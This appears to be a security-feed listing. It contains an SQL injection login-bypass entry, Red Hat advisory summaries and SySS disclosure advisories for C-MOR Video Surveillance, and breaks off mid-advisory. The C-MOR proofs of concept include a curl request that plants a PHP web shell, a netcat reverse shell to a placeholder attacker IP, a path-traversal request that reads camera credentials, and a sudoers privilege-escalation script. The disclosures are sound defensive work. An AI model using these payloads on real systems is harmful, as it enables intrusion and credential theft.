Online Survey System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Online Survey System 1.0 auth by pass Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user&pass = ' or 0=0 ##[+] http://127.0.0.1/survey/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Survey System 1.0 SQL Injection

Red Hat Security Advisory 2024-6428-03 - An update is now available for Red Hat Ansible Automation Platform 2.4. Issues addressed include denial of service, memory exhaustion, remote SQL injection, and traversal vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6428.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix UpdateAdvisory ID:        RHSA-2024:6428-03Product:            Red Hat Ansible Automation PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6428Issue date:         2024-09-09Revision:           03CVE Names:          CVE-2024-5569====================================================================Summary: An update is now available for Red Hat Ansible Automation Platform 2.4Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.Security Fix(es):* automation-controller: Django: Potential SQL injection in QuerySet.values() and values_list() (CVE-2024-42005)* automation-controller: Django: Potential denial-of-service vulnerability in django.utils.html.urlize() and AdminURLFieldWidget (CVE-2024-41991)* automation-controller: Django: Potential denial-of-service vulnerability in django.utils.html.urlize() (CVE-2024-41990)* automation-controller: python-jose: algorithm confusion with OpenSSH ECDSA keys and other key formats (CVE-2024-33663)* automation-controller: python-social-auth: Improper Handling of Case Sensitivity in social-auth-app-django (CVE-2024-32879)* automation-controller: Gain access to the k8s API server via job execution with Container Group (CVE-2024-6840)* python3/python39-django: Potential SQL injection in QuerySet.values() and values_list() (CVE-2024-42005)* python3/python39-django: Potential denial-of-service vulnerability in django.utils.html.urlize() and AdminURLFieldWidget (CVE-2024-41991)* python3/python39-django: Potential denial-of-service vulnerability in django.utils.html.urlize() (CVE-2024-41990)* python3/python39-django: Memory exhaustion in django.utils.numberformat.floatformat() (CVE-2024-41989)* python3/python39-django: Potential denial-of-service in django.utils.translation.get_supported_language_variant() (CVE-2024-39614)* python3/python39-django: Potential directory-traversal in django.core.files.storage.Storage.save() (CVE-2024-39330)* python3/python39-django: Username enumeration through timing difference for users with unusable passwords (CVE-2024-39329)* python3/python39-django: Potential denial-of-service in django.utils.html.urlize() (CVE-2024-38875)* python3/python39-grpcio: client communicating with a HTTP/2 proxy can poison the HPACK table between the proxy and the backend (CVE-2024-7246)* python3/python39-zipp: Denial of Service (infinite loop) via crafted zip file (CVE-2024-5569)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Updates and fixes for automation controller:* Updated the receptor to not automatically release the receptor work unit when \"RECEPTOR_KEEP_WORK_ON_ERROR\" is set to true (AAP-27635)* Updated the Help link in the REST API to point to the latest API Reference documentation (AAP-27573)* Fixed a timeout error in the UI when trying to load the Activity Stream (AAP-26772)* automation-controller has been updated to 4.5.10Updates and fixes for automation hub:* API browser now correctly escapes JSON values (AAH-3272, AAP-14463)* python3/python39-pulpcore has been updated to 3.28.31* python3/python39-pulp-ansible has been updated to 0.20.8Additional fixes:* Gunicorn python package will no longer obsolete itself when checking for or applying updates (AAP-28364)* python3/python39-django has been updated to 4.2.15* python3/python39-grpcio has been updated to 1.58.3* python3/python39-jmespath has been updated to 0.10.0-5* python3/python39-zipp has been updated to 3.19.2Solution:CVEs:CVE-2024-5569References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2277035https://bugzilla.redhat.com/show_bug.cgi?id=2277297https://bugzilla.redhat.com/show_bug.cgi?id=2295935https://bugzilla.redhat.com/show_bug.cgi?id=2295936https://bugzilla.redhat.com/show_bug.cgi?id=2295937https://bugzilla.redhat.com/show_bug.cgi?id=2295938https://bugzilla.redhat.com/show_bug.cgi?id=2296413https://bugzilla.redhat.com/show_bug.cgi?id=2298492https://bugzilla.redhat.com/show_bug.cgi?id=2302433https://bugzilla.redhat.com/show_bug.cgi?id=2302434https://bugzilla.redhat.com/show_bug.cgi?id=2302435https://bugzilla.redhat.com/show_bug.cgi?id=2302436

Red Hat Security Advisory 2024-6428-03

Red Hat Security Advisory 2024-6421-03 - An update for bubblewrap and flatpak is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6421.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: bubblewrap and flatpak security updateAdvisory ID:        RHSA-2024:6421-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6421Issue date:         2024-09-09Revision:           03CVE Names:          CVE-2024-42472====================================================================Summary: An update for bubblewrap and flatpak is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Bubblewrap (/usr/bin/bwrap) is a core execution engine for unprivileged containers that works as a setuid binary on kernels without user namespaces.Security Fix(es):* flatpak: Access to files outside sandbox for apps using persistent= (--persist) (CVE-2024-42472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-42472References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-6421-03

Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.

Samhain File Integrity Checker 4.5.1

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from a command injection vulnerability.

Advisory ID:               SYSS-2024-030  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        OS Command Injection (CWE-78)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45179  
Authors of Advisory:       Matthias Deeg (SySS GmbH), Chris Beiter,  
                            Frederik Beimgraben,

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to insufficient input validation, the C-MOR web interface is  
vulnerable to OS command injection attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functionality is vulnerable to OS command injection attacks, for  
example for generating new X.509 certificates or setting the time zone.

The OS command injection vulnerability in the script "generatesslreq.pml"  
can be exploited as a low-privileged authenticated user (see   
SYSS-2024-024[3])  
in order to execute commands in the context of the Linux user "www-data".

The OS command injection vulnerability in the script "settimezone.pml"  
requires an administrative user for the C-MOR web interface.

By also exploiting the privilege escalation vulnerability described in  
SYSS-2024-027[4], it is possible to execute commands on the C-MOR system  
with root privileges.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By sending the following HTTP POST request to the script  
"generatesslreq.pml", the injected OS command via the parameter  
"city" is executed as Linux user "www-data".

In this sample attack vector, a simple PHP web shell is created in  
the backup directory within the web server's webroot:

POST /generatesslreq.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 152  
Connection: close

countrycode=de&state=state&city=city'|echo '<?php echo   
system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php   
#&organization=org&servername=syss

This PoC attack can be performed using the following curl command:

curl -X POST -d "countrycode=de&state=state&city=city'|echo '<?php echo   
system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php   
#&organization=org&servername=syss" --user "<USERNAME>:<PASSWORD>"   
--ciphers "DEFAULT:!DH" https://<HOST>/generatesslreq.pml

The uploaded web shell can be used via the following URL:

https://<HOST>/backup/web shell.php?cmd=<COMMAND>

In version 6.00PL01, an OS command injection was, for instance, possible  
using the following attack vector:

curl -X POST \  
   -d   
'hour=00&min=34&sec=27&day=06&month=06&year=2024+%26%26+nc+<ATTACKERIP>+<ATTACKER-PORT>+-e+/bin/bash+%26'   
\  
   --user "<USERNAME>:<PASSWORD>" \  
   --insecure \  
   --ciphers 'DEFAULT:!DH' \  
   https://<HOST>/en/setdatetime.pml

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The described security vulnerability has not been fixed entirely in the   
newly  
released software version 6.00PL01.

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-030

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-030.txt  
[3] SySS Security Advisory SYSS-2024-024

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt  
[4] SySS Security Advisory SYSS-2024-027

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt  
[5] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Command Injection

C-MOR Video Surveillance version 5.2401 makes use of unmaintained vulnerability third-party components.

Advisory ID:               SYSS-2024-029  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Dependency on Vulnerable Third-Party   
Component (CWE-1395)  
                            Use of Unmaintained Third Party Components   
(CWE-1104)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2017-9798, CVE-2017-3167, and more  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

The C-MOR system uses several outdated third-party software components  
with known security vulnerabilities.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR system, it was found that the C-MOR system depends  
on several outdated third-party software components with known security  
vulnerabilities, for instance an old Linux kernel, Apache HTTP Server  
2.2.16, PHP 5.3.3, or Python 2.6.

Some of the used software components have also reached their end of life  
and are not supported anymore by a maintainer.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following excerpt of the "dpkg-query" output illustrates some outdated  
third-party software components used on the C-MOR system:

$ sudo dpkg-query -l  
(...)  
ii  apache2                             2.2.16-6+squeeze10   
Apache HTTP Server metapackage  
ii  apache2-mpm-prefork                 2.2.16-6+squeeze10   
Apache HTTP Server - traditional non-threaded model  
ii  apache2-utils                       2.2.16-6+squeeze10   
utility programs for webservers  
ii  apache2.2-bin                       2.2.16-6+squeeze10   
Apache HTTP Server common binary files  
ii  apache2.2-common                    2.2.16-6+squeeze10   
Apache HTTP Server common files  
(...)  
ii  libapache2-mod-php5                 5.3.3-7+squeeze14   
server-side, HTML-embedded scripting language (Apache 2 module)  
(...)  
ii  libssl0.9.8                         0.9.8o-4squeeze14            SSL   
shared libraries  
(...)  
ii  linux-image-4.7.8                   c-mor-v5-00   
Linux kernel binary image for version 4.7.8  
(...)  
ii  php5                                5.3.3-7+squeeze14   
server-side, HTML-embedded scripting language (metapackage)  
rc  php5-cgi                            5.3.3-7+squeeze14   
server-side, HTML-embedded scripting language (CGI binary)  
ii  php5-cli                            5.3.3-7+squeeze14   
command-line interpreter for the php5 scripting language  
ii  php5-common                         5.3.3-7+squeeze14   
Common files for packages built from the php5 source  
ii  php5-gd                             5.3.3-7+squeeze14            GD   
module for php5  
ii  php5-mysql                          5.3.3-7+squeeze14   
MySQL module for php5  
ii  php5-suhosin                        0.9.32.1-1   
advanced protection module for php5  
(...)  
ii  python2.6                           2.6.6-8+b1                   An   
interactive high-level object-oriented language (version 2.6)  
ii  python2.6-minimal                   2.6.6-8+b1                   A   
minimal subset of the Python language (version 2.6)  
(...)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-029

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-029.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, and Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Insecure Third-Party Components

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 stores sensitive information, such as credentials, in clear text.

Advisory ID:               SYSS-2024-028  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        Cleartext Storage of Sensitive Information   
(CWE-312)  
Risk Level:                Medium  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45175  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Sensitive information is stored in cleartext.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR system, it was found that sensitive information,  
for example login credentials of cameras, is stored in clear text.

Thus, an attacker with file system access, for example exploiting a path  
traversal attack (see SYSS-2024-025[3]), has access to the login data of  
all configured cameras or the configured FTP server.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By exploiting the path traversal attack in the backup download script  
"download-bkf.pml", login credentials of cameras can be retrieved, as  
the following HTTP request and the corresponding response demonstrate:

POST /download-bkf.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 24  
Connection: close

bkf=../../../etc/ip.cam1

HTTP/1.1 200 OK  
(...)

192.168.1.11  
80  
<USERNAME>  
<PASSWORD>

This PoC attack can be performed using the following curl command:

curl -X POST -d 'bkf=../../../etc/ip.cam1' --user   
'<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH'   
https://<HOST>/download-bkf.pml  
192.168.1.11  
80  
<USERNAME>  
<PASSWORD>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-028

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-028.txt  
[3] SySS Security Advisory SYSS-2024-025

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt  
[4] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, and Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Information Disclosure / Cleartext Secret

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from an improper privilege management vulnerability that can allows for privilege escalation.

Advisory ID:               SYSS-2024-027  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        Improper Privilege Management (CWE-269)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45173  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper privilege management concerning sudo privileges, C-MOR  
is vulnerable to a privilege escalation attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR system with shell access (see SYSS-2024-026[3]),  
it was found that the Linux user "www-data" running the C-MOR web  
interface can execute some OS commands as root via sudo without having  
to enter the root password.

These commands, for example, include "cp", "chown", and "chmod", which  
enable an attacker to modify the system's sudoer file in order to  
execute all commands with root privileges.

Thus, it is possible to escalate the limited privileges of the user  
"www-data" to root privileges.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

For demonstrating a privilege escalation attack with shell access as  
the user "www-data", the following shell script was uploaded to the  
C-MOR system and executed:

$ cat privesc.sh  
sudo cp /etc/sudoers /home/cam  
sudo chown www-data /home/cam/sudoers  
sudo chmod 777 /home/cam/sudoers  
echo 'www-data        ALL = (ALL) NOPASSWD: ALL' >> /home/cam/sudoers  
sudo chmod 440 /home/cam/sudoers  
sudo chown root /home/cam/sudoers  
sudo cp /home/cam/sudoers /etc/sudoers  
sudo rm /home/cam/sudoers

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-027

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt  
[3] SySS Security Advisory SYSS-2024-026

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-026.txt  
[4] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Privilege Escalation

C-MOR Video Surveillance version 5.2401 suffers from a remote shell upload vulnerability.

Advisory ID:               SYSS-2024-026  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Unrestricted Upload of File with Dangerous   
Type (CWE-434)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45171  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

